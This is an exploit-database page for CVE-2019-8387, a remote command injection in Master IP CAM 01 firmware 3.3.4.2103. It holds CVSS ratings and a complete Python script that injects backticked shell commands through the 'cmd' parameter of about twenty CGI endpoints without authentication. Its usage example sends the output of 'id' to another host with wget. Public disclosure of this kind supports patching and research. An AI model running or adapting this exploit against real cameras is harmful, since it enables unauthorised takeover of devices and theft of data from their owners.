Master IP CAM 01 3.3.4.2103 Remote Command Execution

2019.02.19
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Master IP CAM 01 Remote Command Execution # Date: 09-02-2019 # Remote: Yes # Exploit Authors: Raffaele Sabato # Contact: https://twitter.com/syrion89 # Vendor: Master IP CAM # Version: 3.3.4.2103 # CVE: CVE-2019-8387 import sys import requests if len(sys.argv) < 3: print "[-] Usage: python MasterIpCamRCE.py <ip> <cmd>" print "[-] Example: python MasterIpCamRCE.py 192.168.1.54 'wget http://192.168.1.55:4444/$(id)'" exit(1) host = sys.argv[1] command = sys.argv[2] page = [ "bconf.cgi", "ddns_start.cgi", "getddnsattr.cgi", "getinetattr.cgi", "getnettype.cgi", "getupnp.cgi", "getwifiattr.cgi", "getwifistatus.cgi", "inetconfig.cgi", "iptest.cgi", "listwifiap.cgi", "p2p.cgi", "paraconf.cgi", "scanwifi.cgi", "setadslattr.cgi", "setddnsattr.cgi", "setinetattr.cgi", "setwifiattr.cgi", "upnp_start.cgi", "wifimode.cgi", "wifitest.cgi", ] for x in page: url = "http://"+host+"/cgi-bin/"+x+"?cmd=`"+command+"`" #url = "http://"+host+"/cgi-bin/"+x+"?action=`"+command+"`" print "[*] Attack on "+x print "[+] Sending the payload" r = requests.get(url) if r.status_code == 200: print "[+] Exploit Success" break


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top